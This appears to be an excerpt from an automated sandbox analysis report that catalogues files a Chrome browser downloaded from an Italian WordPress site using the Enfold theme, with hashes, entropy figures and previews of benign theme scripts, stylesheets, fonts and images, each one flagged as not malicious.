                                                                                                                                              SSDEEP:12:2r/t0BkT8WGSzReJmKLEl2e9GBqHmTXFBTl2XFuUMJutMb:2LuBkgMIJmKLA2eaTXFT21uUMJuWb
                                                                                                                                              MD5:0E4728339010DF1327BE3712965E0BB5
                                                                                                                                              SHA1:969FE827736729AC4B593308FE5B97506B209EBF
                                                                                                                                              SHA-256:1951200C247279D31F6C253F3018ED34ABD57B0D20B62C34352FC57BF10D8CDA
                                                                                                                                              SHA-512:11324FFBA55A77D85F466A1E9C3817CDF4B832FAD07C87AA6C41976EE437FB5733B6F5C7D199D61E9E8A6963A16F346E693FFF2EC52B63B22D2AEC25FC7B1166
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:(function($).{ .."use strict";....// -------------------------------------------------------------------------------------------..// Iconlist shortcode javascript..// -------------------------------------------------------------------------------------------....$.fn.avia_sc_iconlist = function(options)..{...return this.each(function()...{....var iconlist = $(this), elements = iconlist.find('>li');........//trigger displaying of thumbnails....iconlist.on('avia_start_animation', function()....{.....elements.each(function(i).....{......var element = $(this);......setTimeout(function(){ element.addClass('avia_start_animation') }, (i * 350));.....});....});...});..}.....}(jQuery));
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2104
                                                                                                                                              Entropy (8bit):4.895184444356603
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:O5KX2hykEYvnmr3cfUpwTe1BFpwVkwbmowQpw3hwOV7wBpZH:622hZEY+r3OH4WH
                                                                                                                                              MD5:7FC4E70A2076C827E4991441CEC84F6A
                                                                                                                                              SHA1:D11479D83A0002EE84F6B748DFD760AD89B71B66
                                                                                                                                              SHA-256:1D05E4D2FA1A179E5854B72F536EFA09739EB9FF8FF1D44DAA827CACCA1018C4
                                                                                                                                              SHA-512:B5BF5E0BA9037515F8FC4942EFE00D044029EC488C198BA95D0B84247B78DA29A0719BA935A9F0420D8408136E91C8853BF594A6EDE2D36667A19AC691973858
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/google_maps/google_maps.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================..GOOGLE MAPS..====================================================================================================================================================== */.....avia-google-maps-section{border:none;}...avia-google-maps-section.avia-builder-el-0{border-top-style: solid; border-top-width: 1px;}...avia-google-map-container{position: relative; clear:both;}...avia-google-map-container img { max-width: none; }...avia-google-map-container div, .avia-google-map-container img, .avia-google-map-container a{..-webkit-box-sizing: content-box; -moz-box-sizing: content-box; box-sizing: content-box;}...avia-google-map-container .gm-style-iw p {color: #444;}.......av_gmaps_sc_main_wrap .avia-google-map-container.avia-google-map-sc{...background: no-repeat center;...background-size: cover;..}.....av_gmaps_sc_main_wrap .av_text_confirm_link{
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (5652)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):70105
                                                                                                                                              Entropy (8bit):5.0346659128132245
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:7iLcOLAfHjpoM0hvTzWbjd3JSS7hMmGV/z74ybRG0vNpXrRLoZ0NRqovJ+zG0Jco:7iLNLAfH2hvTzWHdkS9GV/z74YJ+9cPw
                                                                                                                                              MD5:F91DA3B6621BE518E3C492F2745595FB
                                                                                                                                              SHA1:DF4EEFB154B5716480512A0D3E53124276E00ECA
                                                                                                                                              SHA-256:6CF4E6314E1FF943BC5184762FE965602680F93993C65AEB39F901D7CDF79194
                                                                                                                                              SHA-512:D84FB037119466837FBC2B3C2642092AE33B9A257A9BB39A1987D6260A81A223D3C30CD59E2D6C9B0CB6AAB33AAE242827771703BD170F83100780D42EB2F1D1
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/js/avia.js?ver=4.5
                                                                                                                                              Preview:(function($).{.. "use strict";... $(document).ready(function(). {. . var aviabodyclasses = AviaBrowserDetection('html');....$.avia_utilities = $.avia_utilities || {};...if( /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent) && 'ontouchstart' in document.documentElement). .{. ..$.avia_utilities.isMobile = true;. .}. .else. .{. ..$.avia_utilities.isMobile = false;. .}....//activates the hamburger mobile menu...avia_hamburger_menu();... . //show scroll top but1ton. avia_scroll_top_fade();. . //calculate width of content. aviaCalcContentWidth();. . //creates search tooltip. new $.AviaTooltip({"class": 'avia-search-tooltip',data: 'avia-search-tooltip', event:'click', position:'bottom', scope: "body", attach:'element', within_screen: true});.. //creates relate posts tooltip. new $.AviaTooltip({"class": 'avia-related-tooltip', d
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3874
                                                                                                                                              Entropy (8bit):4.868159924024015
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:UpEuZVBaSROpC2naxByjCdGUXoJoxKycxQQhzAY1RTspAQ1mOy:4bZq/4joJoTcfbTEof
                                                                                                                                              MD5:AC668671BD365BB72715B266F9271104
                                                                                                                                              SHA1:C709DE79489609DCD4F3E997A3881122C20A1AAA
                                                                                                                                              SHA-256:6FFCCFD49D5B0B8C3483C78672A281C00DFB05651E7BDA6495152EABEF75058C
                                                                                                                                              SHA-512:25938F838C08653CB92BF8D95370BF5ECC9EACA39958E441E3FE51BDFA71C7C89016395E0F00BEA6E948DF864498930FC7F0BAEF1C8528A73EACB8C2FAA89BB2
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/menu/menu.js?ver=6.0.9
                                                                                                                                              Preview:(function($).{ .."use strict";..$.avia_utilities = $.avia_utilities || {};....$(document).ready(function(). {.... //activates the sticky submenu...$.avia_utilities = $.avia_utilities || {};. if($.avia_utilities.avia_sticky_submenu)...$.avia_utilities.avia_sticky_submenu(); . });......$.avia_utilities.avia_sticky_submenu = function()..{...var win ..= $(window),....html ..= $('html:first'),....header .= $('.html_header_top.html_header_sticky #header'),....html_margin = parseInt( $('html:first').css('margin-top'), 10),....setWitdth.= $('.html_header_sidebar #main, .boxed #main'),....menus..= $('.av-submenu-container'),....bordermod.= html.is('.html_minimal_header') ? 0 : 1,....fixed_frame.= $('.av-frame-top').height(),....calc_margin.= function()....{.....html_margin = parseInt( html.css('margin-top'), 10);.....if(!$('.mobile_menu_toggle:visible').length).....{......$('.av-open-submenu').removeClass('av-open-submenu');.....}..........menus.filter('.av-sticky-submenu').each(f
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2124
                                                                                                                                              Entropy (8bit):4.810467341015722
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:JZzSObV8Jbig1pojcF8yiH4/oSholrKkFgJT8VNue0M1aAYnS7nrsr1AZHXS0g:J0Ob6trrZKvHmJh4lA43uXM1dYCNO
                                                                                                                                              MD5:359A244DC809F6EE98EB8C04BF404CB0
                                                                                                                                              SHA1:75063A0520C42BE40D91E8920EFAB982BCB00326
                                                                                                                                              SHA-256:15A14687E664CC2869FE6ACC64B27F459CA2B527C968A9C831FE13920E097C43
                                                                                                                                              SHA-512:F044EBDF8BD4F1E2269C7538998467A7D8B584DB3D479D9AC8F729056719BB98BED170E25040A920741F0D95F09BD685CBDC0699FA6698DA12F75A634ADB63C0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Countdown.====================================================================================================================================================== */...av-countdown-timer{clear:both; position: relative; opacity: 0; margin:30px 0;}..av-countdown-timer-inner{display: table; width: 100%; table-layout: fixed;}..av-countdown-timer-inner:hover {text-decoration: none;}..av-countdown-cell{display: table-cell; }..av-countdown-cell-inner{display: block; margin:1px 1px 0 0; padding:20px;}..av-countdown-time{display: block; font-size:40px; line-height: 1em; font-weight:100; color:inherit; text-decoration: none;}..av-countdown-time-label{display: block; text-transform: uppercase; color:inherit; overflow: hidden; text-overflow: ellipsis; -moz-hyphens: inherit; line-height: 1.65em;}..av-countdown-timer-title{display: block; font-size:3
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format, TrueType, length 30804, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):30804
                                                                                                                                              Entropy (8bit):7.989962080794974
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:7YYjvXZLsgasr521gdWs5GO7fshyrHuu+Ukk:MYjvXZLzDd95z1HdT
                                                                                                                                              MD5:A1AEB367498D7280CD2246F4974E988A
                                                                                                                                              SHA1:57058B69EA614E2BDEE874E882A92C4F32058C4D
                                                                                                                                              SHA-256:75E801B453BD677C68D4AF036055B3036B8FC0390A76BF4661AB50E22B1137EE
                                                                                                                                              SHA-512:090AD18AA879F6504C18C57E6F65537689BD6C3D99EC7F8CB432AB4C38257DC6209D852A9FBCA9E02C15E99825162568D2CA5578328BFB8CF0C2498E2AC505F3
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-template-builder/assets/fonts/entypo-fontello.woff
                                                                                                                                              Preview:wOFF......xT................................OS/2.......D...V>QJ/cmap...8...:...J.<..glyf...t..i....H..head..j....3...6....hhea..j........$...Thmtx..j..........f..loca..l....\...\G.pXmaxp..n........ .E..name..o........!...:post..p..........7\\x.c`d.e......T......B3>`0ddb``b`ef....\S..^0..f......\..(.........x.c```f.`..F..p....|... ........^j...R...DK0B...#..........x....l..(6U........>}z{..q.9s..m.{..3;...Y~....:..8...X....e!.Y...B+.G,.....B.!..B.....B.. .B.l.Z..Z...m......c.{s.y.._..U_U}...r.......?.2!-.B...L..).kT.0.Bn.4..at......+u.q_..H..w...$fF..[..I..e..SzL....4C.GCP.._....T1..P..mg......}...[...B..N......7[-%.d...Pe...x.<*.....P..I|.2C{B.......mm....\.O..hm.....(.v4...u.p".Ox|.P..C....o..t".....1.Qf>Q.$...D.&..%{+.$t..&...a2....m../B..'.=...bZ-[tM.Y....fl..hCME.=..7.......t.~}..2...(t...p...../.:..Q....*..tH..~+....(....".....R.-`d`7E3..b.~H.u.I..[...#.....As...q....i...b.8.]<...e...=.......i/a.F.6.B....TO!....~..`+x....#.8...g....y..c "...5L..T
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2435
                                                                                                                                              Entropy (8bit):4.953724044433105
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:MQze1dDO11dhhl5OlQONiHRClV/WV/kWm8+8r5eq:MQze1dDO11dhhlMlQK2YhWhkWP5h
                                                                                                                                              MD5:CC8DFD3FF6E84DD6A46C141772D825B1
                                                                                                                                              SHA1:B7FEFEF63F42FD4EF0717D71032F08295125608D
                                                                                                                                              SHA-256:262292E4BA5C6CA6E11BCE7D24F39C0FCDFBB7D7867996BC1A55ECB2F8625F50
                                                                                                                                              SHA-512:BA0F95D86A1B3DE2695093B49521E66076E2F6BE67C151F72EB6A4CE642B5DCB2FAFD89837E2DCC601EC3D4F3658C7D2011ECB1A4DF90A20C98E58372D78AA8F
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Gallery.====================================================================================================================================================== */.#top div .avia-gallery{overflow: hidden; padding-bottom:2px; clear:both;}.#top div .avia-gallery img{float:left; border-style: solid; border-width:1px; padding:7px; width:100%; border-radius: 0;}.#top div .avia-gallery .avia-gallery-big{display: block;overflow: hidden; padding:7px; margin-bottom:-1px; border-top-left-radius: 2px; border-top-right-radius: 2px; border-style: solid; border-width:1px;}.#top div .avia-gallery .avia-gallery-big-inner{display: block;overflow: hidden; height: 100%;}.#top div .avia-gallery .avia-gallery-big img{padding:0; border:none;}.#top .avia-gallery .avia-gallery-thumb a{ width:20%; opacity: 1; }.#top #wrap_all .avia-gallery .avia-gallery-thumb
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 1051 x 630, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):834032
                                                                                                                                              Entropy (8bit):7.994041545331016
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:12288:7Ht2ldZazO/7FjxHExIDonrXaYEpX/l3J3hcgGS13VTOxExP6FzVkqCJic:7Ht2ldZ+5x6orKvVJxLGuVTOixPgqN
                                                                                                                                              MD5:93A185206C73A36128C4CADB337B0666
                                                                                                                                              SHA1:C19C0B471FD903D0B5433E2079B3D0488F2B508F
                                                                                                                                              SHA-256:05AECB32FCBC40E6F291A94FC3D347A6CDA7161E0DFC633106C47507C8B397BC
                                                                                                                                              SHA-512:6922A942E79E2C7552AF8D894C0D1F9421E280379A8C5BF9260CF29CC748BD44ED0176D540860C8279475B89596B49BFB83489F26286C7C9F2ADDC40BB3B344D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/uploads/2024/08/Schermata-2024-08-29-alle-09.22.19-1051x630.png
                                                                                                                                              Preview:.PNG........IHDR.......v........z....IDATx....%I.....HV?\.....Q..y0. .U...Y.\..p.... ........?0....?....`n.\.oV...an..g...7...........?....S.V..>. ...|}O..w7..-7.~.n.....q...~7...n...h.dq=...:...;.......8`X.&^S]S}..{......^....za.=k.6..\.&......'..0.7...z..nn..........?.~..X..>.i.N...}X.........qj9..3.+..C.......b../.|.N.i..u.h....S.j.s.....X....47.4....].....b...p....=._^.9..Z..}:;.....x!....iL...bn.psG...z...m....`..n........].3\..~.]|..]....m.[.p].c....D..........p.&]K.+Y]c.u7.wv=.....y.....5.s..w....u...m-.7.Z.c......|.%.{.5....XSb..h.....V^..k....1od....i. ?k.S...^.k8d}4x.]..}..4..r.k.h^.3@..q.....F.>b..Bm....8>,Ck.....aM.?.m./..}.....:_.....5V./.Z.....L..Y._|>^.S.E....c....?...i}..jX?.9.W.w.a|>.....K.i........L.............O......5..]_o.g....n...~....6@..p-r*...A..(..@.....VUQ|..U.6.8[.@.o.r....\@saj......b..M.......Z.h1... ]E.i.."m._.t.49...)...t .h=k~.~...p.9.....h...Y....UY........2..\...A..\?3..}..Y.\.WE.....a.&@..m"[.O;.._2..".+.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1660
                                                                                                                                              Entropy (8bit):4.301517070642596
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:A/S9VU5IDhYYmMqPLmumtrYW2DyZ/jTq9J:A2VUSDhYYmM5trYFw/jmD
                                                                                                                                              MD5:554640F465EB3ED903B543DAE0A1BCAC
                                                                                                                                              SHA1:E0E6E2C8939008217EB76A3B3282CA75F3DC401A
                                                                                                                                              SHA-256:99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
                                                                                                                                              SHA-512:462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.gstatic.com/images/branding/googlelogo/svg/googlelogo_clr_74x24px.svg
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4709
                                                                                                                                              Entropy (8bit):5.053524279383076
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:lQ1054RTR06n/rGqa8aZl8/S0AMYBN1BN+C:KK+hR0m/aqa8aZl89qxCC
                                                                                                                                              MD5:A4DC41323D6034F43EB82755D9159C0A
                                                                                                                                              SHA1:B86E2C86B46E529498A708834BE258290C07A28E
                                                                                                                                              SHA-256:BC6C38BB6D4EAA60AC019C728A25EBCC36B6A6D4ED7EA41FF83BED6DCC0D25EA
                                                                                                                                              SHA-512:A4346EE71FBC7E4D79FA22526D99300C60D42FA182C0DD1506576CBA914CA3A520234A6988122EB83A9181952E1672062701558ECE5B61A8808047D81FB479FF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons/buttons.css?ver=6.0.9
                                                                                                                                              Preview:/* ======================================================================================================================================================.Button.====================================================================================================================================================== */../*button element*/..avia-button-wrap{display:inline-block;}...avia-button{.color:#777;.border-color: #e1e1e1;.background-color: #f8f8f8;.}..body div .avia-button{.border-radius: 3px;.padding:10px;.font-size: 12px;.text-decoration: none;.display:inline-block;.border-bottom-style: solid;.border-bottom-width: 1px;.margin:3px 0;.line-height: 1.2em;.position: relative;.font-weight: normal;.text-align: center;.max-width: 100%;.}...avia-button:hover{opacity: 0.9;}..avia-button:active{border-bottom-width: 0px; border-top-width: 1px; border-top-style: solid;}..avia-button.avia-color-theme-color-subtle{background-image: none;}..avia-button.avia-color-theme-color-subtle:hover{}....avia-
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:assembler source, ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):23906
                                                                                                                                              Entropy (8bit):5.061256688565355
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:384:rVz6tRnHm+rF2GljGm94rDQBzdXlbmGFfk9ymZ:rheJrFbjG1DS8GFfjI
                                                                                                                                              MD5:C7B132A42173351B8DA871D8F8968C57
                                                                                                                                              SHA1:5B8AF060AED7F2A646F216F1E0E76CD846AA2741
                                                                                                                                              SHA-256:BC672A64828957342C967EF1374EA3CFBE1FF1384A4E3D67AD11D71DF9711F7F
                                                                                                                                              SHA-512:4B34979FA945EF83C99BB1A6F1C089C5B0DFAD3C04F975789FFACE64E304680172102A3CC99EC18ADB3D734258D1A140F60B50299753C480AA3529C7E11E2913
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/css/avia-snippet-widget.css?ver=4.5
                                                                                                                                              Preview:/* ======================================================================================================================================================.#Sidebar & Widgets.====================================================================================================================================================== */.....sidebar .widget:first-child, .content .sidebar .widget:first-child{.padding-top:0;.border-top-style: none;.border-top-width: 0;.}../* archive widget */..widget_archive label.screen-reader-text {. display: none;.}.../*nav menu widget*/....widget_nav_menu a{.display: block;.padding:4px 0px 5px 0;.text-decoration: none;.}..div .widget_nav_menu{.padding-bottom:24px;.}..#top .widget_nav_menu ul{margin:0; padding:0; float: none; list-style-type: none;}..#top .widget_nav_menu li{.position: relative;.-webkit-box-sizing: content-box; .-moz-box-sizing: content-box; .box-sizing: content-box;.clear:both;.font-size:13px;.}..#top #footer .widget_nav_menu li{ background-co
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 24016, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):24016
                                                                                                                                              Entropy (8bit):7.991051678216668
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:384:+XLm9ZyQls6kP+4wa23XIY7FF51G/Y6rCTTj1KSKIha9Dpy4e+LZa6+sMQrk/h59:ZyH9PEawXI8N1l6+TdT8hresyz5JFaq/
                                                                                                                                              MD5:85F00D66C5F31D58833ABF1CFBE1496E
                                                                                                                                              SHA1:D504A89747D1258A4C4FAFF0EBC6F63853B570D6
                                                                                                                                              SHA-256:3270680FC889EABFB9C410EE690161071F237679A90171A0A67B09142B8D382C
                                                                                                                                              SHA-512:FE38F685B8A78875403B482EC93A9F66B1EE729FAEFE8BCCEF1FE47E85F5D43FFA3AEE0AB6D6DFCEEB20D7C5555CA9EA69FDD985C3DB680F60D8CBA5C6C798C5
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://fonts.gstatic.com/s/dancingscript/v25/If2cXTr6YS-zF4S-kcSWSVi_sxjsohD9F50Ruu7BMSo3Sup8.woff2
                                                                                                                                              Preview:wOF2......]..........]l.........................|...j..J.`?STAT...:.....|..Z..v..6.$..h. .........p...Vl...jV.?..l..n...`O.D.....|v......^.n.Xb+JW"{Uo/4\U.Fw..d.{q..t?.6..*6..ZU...p...0.b)Jc0.$G.4nEbA.H..8r.-..>......T(j..E`..G...9}.,.%.Q.G.`.........5...Q1..Sc...M."..p..!.Z..!.ZH...x..MEm....hg...Y.y..~.D.c...e.?.t....C..P..^)..!....S...I.p.....D.)Cl..|o..'...}\..s.D"i?.[...M.....i~S..J+1....d..1 @B.!.R....M.{..k0. ..(X.S5s.........M.U+....?(@.5b....U..+Z.b...S....Qb.J+2m...2H..Zr.....w...A.h...3...O....O.U....].a.$...b..Z........3...qf.`M.hS...T~cZ..w....D]..<...J.{ju.......... .Vi..k.6d......z.6..."M...).q.h.Q.....@f...j.....;.T.Xt.k......@`..$4.v.....|6Iq...@.A.z...&:..b.'J.1.!..E..\....z..t.....]S...........K...7%J.a...w...m% .&..-..i.#.B....>PBp"".....n..A...l.. 2..w....\...}k..Z......kc..A.(...w.c.5E3G.......C??....2E....W.|M.5...cM.......p.DX...At...K4........e*=..R....Q.c..zQ..z.3n...m..P..G.........J.@5%.A@....$\.SWN.Z}c.}:-..'P3.Y..O..f
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (65447)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):81643
                                                                                                                                              Entropy (8bit):5.291876854269576
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mj:DIh8GgP3hujzwbhd3c
                                                                                                                                              MD5:5D29C340511ABE57948D254980DC509F
                                                                                                                                              SHA1:4E0C3EA661B400449D1B7B780DE72C50CBA54519
                                                                                                                                              SHA-256:7C8CF3BAA117F63146B7F645CD14185D88AAA417FE4B7EB759AFC102C4C7AA10
                                                                                                                                              SHA-512:DFF5AA4083EB383D0E3F50C25EAF65AB859141588479F8238D8451C66382ADC68ED30F13147615D0436C28F13E4CEBB35BEF92D9A69A827F804E2173339D6429
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-includes/js/jquery/jquery.min.js?ver=3.6.0
                                                                                                                                              Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):3211
                                                                                                                                              Entropy (8bit):4.939607716754517
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:z27TmCEmLJnRPIuQe+9N99yyfDrXrw2U2Ck:z2B1nRQuQe2XAyj2k
                                                                                                                                              MD5:F738C0F2EA1CED7138565ACA2B62DF83
                                                                                                                                              SHA1:A432EF4C07E4101F0C7022C325B095A09459CD97
                                                                                                                                              SHA-256:88177967F5308C304FC2AB14CA52C6C46ABAF8502ACA2100B4AD052C23929808
                                                                                                                                              SHA-512:B16D19A1883499C50BDBA579A1A63BA9DF8E2B39EAEA8F840567ADC4D72AD71864733DDC3BDE95159741D7A5889F82E1472B465FCE75A51074791230DFD2C293
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              URL:https://www.cipassoitalia.it/wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/heading/heading.css?ver=6.0.9
                                                                                                                                              Preview:./* ======================================================================================================================================================.HEADING.====================================================================================================================================================== */..av-special-heading{.width:100%;.clear:both;.display: block;.margin-top:50px;.position: relative;.}...avia_mobile .av-special-heading{.-webkit-perspective: 1000px;.-webkit-backface-visibility: hidden;.}...av-special-heading.avia-builder-el-no-sibling{margin-top:0px; margin-bottom:0px;}...flex_column + .av-special-heading{float:left; }..body .av-special-heading .av-special-heading-tag{.padding:0;.margin:0;.float:left;.}...meta-heading .av-special-heading-tag{.font-weight: normal;.}...custom-color-heading .av-special-heading-tag {.color: inherit;.}...special-heading-border{.position: relative;.overflow: hidden;.}...av-special-heading-h1 .special-heading-border{height: 3.4em;}.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):210
                                                                                                                                              Entropy (8bit):4.8816581093705915
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4sltj4Jol4gRtNz3Ihg5uRIWchg5uRth50hg2:t4394gfNzYQuqRQufhqP
                                                                                                                                              MD5:78FEB91BFDA2DDCE6BCFDCBAB050995B
                                                                                                                                              SHA1:A1433065FC0E8A3D14458AB872BDF44F8A1040FA
                                                                                                                                              SHA-256:7318C9AAB1FA93D98E06F996F797E8A8D02F31FADE30D0DD9B1EE80EFBC76CB5
                                                                                                                                              SHA-512:07092762D3C8C7FF023B8ABCAD1854674C224ADA18D7FC6E3DAE6B89865907BEB388C19359A6E5CD428CAAD4920A05C8803D7D3056FADFE9047AA1F3E7AAB10D
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" id="flag-icons-de" viewBox="0 0 640 480">. <path fill="#ffce00" d="M0 320h640v160H0z"/>. <path d="M0 0h640v160H0z"/>. <path fill="#d00" d="M0 160h640v160H0z"/>.</svg>.
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 18 x 12, 8-bit/color RGB, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):267
                                                                                                                                              Entropy (8bit):6.34426489571429
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:6v/lhPFMkcC/QCllL4N/02j27XW+zFarJUma+7dp:6v/7tH/MN/02j27X7zFara87z
